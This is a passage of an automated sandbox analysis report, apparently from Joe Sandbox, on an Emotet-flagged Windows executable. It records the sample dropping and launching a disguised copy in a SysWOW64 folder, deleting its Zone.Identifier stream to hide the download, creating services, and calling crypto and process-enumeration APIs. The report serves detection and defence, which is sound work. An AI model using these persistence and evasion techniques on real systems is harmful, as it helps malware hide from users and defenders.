Source: svchost.exe, 0000000B.00000003.290284677.0000015EE0C31000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: SystemPropertiesDataExecutionPrevention.exe, 00000002.00000003.341262791.0000000003627000.00000004.00000001.sdmp	String found in binary or memory: https://fs.microsoft.c
Source: svchost.exe, 0000000B.00000002.312371583.0000015EE0C3D000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 0000000B.00000002.312330349.0000015EE0C13000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.312371583.0000015EE0C3D000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000B.00000003.312069072.0000015EE0C45000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000B.00000003.312069072.0000015EE0C45000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000B.00000003.290284677.0000015EE0C31000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000B.00000002.312366257.0000015EE0C3A000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 0000000B.00000002.312330349.0000015EE0C13000.00000004.00000001.sdmp	String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 00000002.00000002.484136450.0000000002AF1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.253560512.0000000000549000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.481950489.0000000000531000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.235061134.00000000022A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.235927547.00000000033E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.5e8fYZ8TM6.exe.22a0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.SystemPropertiesDataExecutionPrevention.exe.2af0000.2.unpack, type: UNPACKEDPE

Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Code function: 2_2_02AF2650 CryptAcquireContextW,CryptGenKey,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx,
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Code function: 2_2_02AF2650 CryptAcquireContextW,CryptGenKey,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx,

Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022901F0 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022901F0 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Code function: 2_2_02AE01F0 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,

Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	File created: C:\Windows\SysWOW64\unenrollhook\			Jump to behavior
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	File created: C:\Windows\SysWOW64\unenrollhook\			Jump to behavior

Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	File deleted: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe:Zone.Identifier			Jump to behavior
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	File deleted: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe:Zone.Identifier			Jump to behavior

Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_00451D80
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A8240
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A3F20
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A7740
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A3BA0
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A1C70
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A6530
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A3D10
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_00451D80
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A8240
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A3F20
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A7740
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A3BA0
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A1C70
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A6530
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A3D10
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Code function: 2_2_02AF8240
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Code function: 2_2_02AF3BA0
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Code function: 2_2_02AF3F20
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Code function: 2_2_02AF6530
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Code function: 2_2_02AF3D10
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Code function: 2_2_02AF1C70
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Code function: 2_2_02AF7740

Source: 5e8fYZ8TM6.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 5e8fYZ8TM6.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 5e8fYZ8TM6.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 5e8fYZ8TM6.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 5e8fYZ8TM6.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 5e8fYZ8TM6.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: 5e8fYZ8TM6.exe, 00000000.00000002.236353987.0000000003880000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs 5e8fYZ8TM6.exe
Source: 5e8fYZ8TM6.exe, 00000000.00000002.234305664.0000000000470000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameSEKPaint2.exe vs 5e8fYZ8TM6.exe
Source: 5e8fYZ8TM6.exe, 00000000.00000002.236532586.0000000003980000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs 5e8fYZ8TM6.exe
Source: 5e8fYZ8TM6.exe, 00000000.00000002.236532586.0000000003980000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs 5e8fYZ8TM6.exe
Source: 5e8fYZ8TM6.exe, 00000000.00000002.234876439.0000000002110000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs 5e8fYZ8TM6.exe
Source: 5e8fYZ8TM6.exe	Binary or memory string: OriginalFilenameSEKPaint2.exe vs 5e8fYZ8TM6.exe
Source: 5e8fYZ8TM6.exe, 00000000.00000002.236353987.0000000003880000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs 5e8fYZ8TM6.exe
Source: 5e8fYZ8TM6.exe, 00000000.00000002.234305664.0000000000470000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameSEKPaint2.exe vs 5e8fYZ8TM6.exe
Source: 5e8fYZ8TM6.exe, 00000000.00000002.236532586.0000000003980000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs 5e8fYZ8TM6.exe
Source: 5e8fYZ8TM6.exe, 00000000.00000002.236532586.0000000003980000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs 5e8fYZ8TM6.exe
Source: 5e8fYZ8TM6.exe, 00000000.00000002.234876439.0000000002110000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs 5e8fYZ8TM6.exe
Source: 5e8fYZ8TM6.exe	Binary or memory string: OriginalFilenameSEKPaint2.exe vs 5e8fYZ8TM6.exe

Source: C:\Windows\System32\svchost.exe	Section loaded: xboxlivetitleid.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cdpsgshims.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xboxlivetitleid.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cdpsgshims.dll

Source: 5e8fYZ8TM6.exe	Binary or memory string: F*\AC:\sekpaint20\SEKPaint2.vbp
Source: 5e8fYZ8TM6.exe, 00000000.00000002.234276941.000000000046C000.00000004.00020000.sdmp, SystemPropertiesDataExecutionPrevention.exe, 00000002.00000002.481834265.000000000046C000.00000004.00020000.sdmp	Binary or memory string: @*\AC:\sekpaint20\SEKPaint2.vbp
Source: 5e8fYZ8TM6.exe	Binary or memory string: F*\AC:\sekpaint20\SEKPaint2.vbp
Source: 5e8fYZ8TM6.exe, 00000000.00000002.234276941.000000000046C000.00000004.00020000.sdmp, SystemPropertiesDataExecutionPrevention.exe, 00000002.00000002.481834265.000000000046C000.00000004.00020000.sdmp	Binary or memory string: @*\AC:\sekpaint20\SEKPaint2.vbp

Source: classification engine

Classification label: mal80.troj.evad.winEXE@18/8@0/6

Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: CloseServiceHandle,_snwprintf,CreateServiceW,CloseServiceHandle,
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: CloseServiceHandle,_snwprintf,CreateServiceW,CloseServiceHandle,

Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Code function: 2_2_02AF4CB0 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,FindCloseChangeNotification,
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Code function: 2_2_02AF4CB0 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,FindCloseChangeNotification,

Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A5070 EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A5070 EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,

Source: C:\Windows\System32\svchost.exe	File created: C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl			Jump to behavior
Source: C:\Windows\System32\svchost.exe	File created: C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl			Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5404:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5404:120:WilError_01

Source: 5e8fYZ8TM6.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 5e8fYZ8TM6.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	File read: C:\Users\desktop.ini			Jump to behavior
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	File read: C:\Users\desktop.ini			Jump to behavior

Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: 5e8fYZ8TM6.exe	Metadefender: Detection: 54%
Source: 5e8fYZ8TM6.exe	ReversingLabs: Detection: 66%
Source: 5e8fYZ8TM6.exe	Metadefender: Detection: 54%
Source: 5e8fYZ8TM6.exe	ReversingLabs: Detection: 66%

Source: unknown	Process created: C:\Users\user\Desktop\5e8fYZ8TM6.exe 'C:\Users\user\Desktop\5e8fYZ8TM6.exe'
Source: unknown	Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknown	Process created: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Process created: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: unknown	Process created: C:\Users\user\Desktop\5e8fYZ8TM6.exe 'C:\Users\user\Desktop\5e8fYZ8TM6.exe'
Source: unknown	Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknown	Process created: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Process created: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable

Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D105A4D4-344C-48EB-9866-EE378D90658B}\InProcServer32
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D105A4D4-344C-48EB-9866-EE378D90658B}\InProcServer32

Source: 5e8fYZ8TM6.exe	Static PE information: real checksum: 0x8839b should be: 0x92711
Source: 5e8fYZ8TM6.exe	Static PE information: real checksum: 0x8839b should be: 0x92711

Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_0040C8B4 push es; retf
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_0040C915 push ds; iretd
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A5E10 push ecx; mov dword ptr [esp], 0000F5B3h
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A5EA0 push ecx; mov dword ptr [esp], 0000A3FDh
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A5EF0 push ecx; mov dword ptr [esp], 0000669Ch
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A5F20 push ecx; mov dword ptr [esp], 0000E36Ch
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A5CD0 push ecx; mov dword ptr [esp], 00001CE1h
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A5D20 push ecx; mov dword ptr [esp], 0000C5A1h
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A5D00 push ecx; mov dword ptr [esp], 00001F9Eh
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A5D50 push ecx; mov dword ptr [esp], 00006847h
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A5D90 push ecx; mov dword ptr [esp], 0000B2E0h
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A5DF0 push ecx; mov dword ptr [esp], 0000AAF5h
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A5DC0 push ecx; mov dword ptr [esp], 000089FAh
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_0040C8B4 push es; retf
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_0040C915 push ds; iretd
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A5E10 push ecx; mov dword ptr [esp], 0000F5B3h
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A5EA0 push ecx; mov dword ptr [esp], 0000A3FDh
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A5EF0 push ecx; mov dword ptr [esp], 0000669Ch
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A5F20 push ecx; mov dword ptr [esp], 0000E36Ch
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A5CD0 push ecx; mov dword ptr [esp], 00001CE1h
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A5D20 push ecx; mov dword ptr [esp], 0000C5A1h
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A5D00 push ecx; mov dword ptr [esp], 00001F9Eh
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A5D50 push ecx; mov dword ptr [esp], 00006847h
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A5D90 push ecx; mov dword ptr [esp], 0000B2E0h
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A5DF0 push ecx; mov dword ptr [esp], 0000AAF5h
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A5DC0 push ecx; mov dword ptr [esp], 000089FAh
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Code function: 2_2_02AF5EA0 push ecx; mov dword ptr [esp], 0000A3FDh
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Code function: 2_2_02AF5D90 push ecx; mov dword ptr [esp], 0000B2E0h
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Code function: 2_2_02AF5DF0 push ecx; mov dword ptr [esp], 0000AAF5h
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Code function: 2_2_02AF5EF0 push ecx; mov dword ptr [esp], 0000669Ch
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Code function: 2_2_02AF5DC0 push ecx; mov dword ptr [esp], 000089FAh
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Code function: 2_2_02AF5CD0 push ecx; mov dword ptr [esp], 00001CE1h
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Code function: 2_2_02AF5D20 push ecx; mov dword ptr [esp], 0000C5A1h
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Code function: 2_2_02AF5F20 push ecx; mov dword ptr [esp], 0000E36Ch
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Code function: 2_2_02AF5D00 push ecx; mov dword ptr [esp], 00001F9Eh
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Code function: 2_2_02AF5E10 push ecx; mov dword ptr [esp], 0000F5B3h
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Code function: 2_2_02AF5D50 push ecx; mov dword ptr [esp], 00006847h

Source: initial sample	Static PE information: section name: .text entropy: 6.95854234229
Source: initial sample	Static PE information: section name: .text entropy: 6.95854234229

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them

Show sources

Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Executable created and started: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Executable created and started: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe

Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	PE file moved: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe			Jump to behavior
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	PE file moved: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	File opened: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe:Zone.Identifier read attributes \| delete
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	File opened: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe:Zone.Identifier read attributes \| delete

Source: C:\Windows\splwow64.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\splwow64.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Process information set: NOOPENFILEERRORBOX
